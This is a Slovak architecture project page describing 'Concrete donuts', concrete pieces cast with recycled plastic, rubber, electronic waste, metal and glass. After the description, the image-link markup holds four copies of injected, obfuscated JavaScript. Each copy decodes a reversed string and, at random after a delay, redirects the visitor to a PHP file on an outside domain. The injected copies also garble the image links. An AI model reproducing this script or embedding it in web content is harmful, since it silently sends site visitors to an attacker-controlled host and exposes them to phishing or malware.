Architekt: Mgr. art. Tomáš Augustín, ArtD.
Spolupráca: VŠVU, CRH-Slovensko, ECOREC
Miesto: Bratislava
Foto: Architektonizer

Concrete donuts vznikli ako vedľajší produkt pri výskume a hľadaní možnosti použitia betónu v spojení s ekologicky spracovaným odpadom. Pri výrobe sa do základnej betónovej zmesi pridávajú  odpady, ktoré sú vo forme malých časti plastov, gúm, elektro-odpadu, kovu a skla. Toto spojenie vytvára jedinečné vlastnosti a možnosti využitia. Betón je fascinujúci a tvárny materiál už po tisícročia a jeho spracovanie je stále témou skúmania. Hľadanie hranice čo tento materiál so svojimi vlastnosťami dokáže sa stále posúva. Poznatky z minulosti spolu s novými technológiami zaväzujú znova objavovať s reflexiou na trvalo udržateľný rozvoj a dizajn v architektúre. Tento prístup prináša prínos v spájaní nových materiálov, ktoré sa dajú použiť v interiérovom dizajne ako aj v stavebnom priemysle čo umocňuje spojenie termínov Personalizácia a Konkretizácia.

 

$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„‚php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonizer.sk/wp-content/uploads/2019/12/concrete-donuts-6-scaled.jpg“>$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„‚php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonizer.sk/wp-content/uploads/2019/12/concrete-donuts-1-scaled.jpg“>$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„‚php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonizer.sk/wp-content/uploads/2019/12/concrete-donuts-5-scaled.jpg“>$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„‚php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonizer.sk/wp-content/uploads/2019/12/concrete-donuts-2-scaled.jpg“>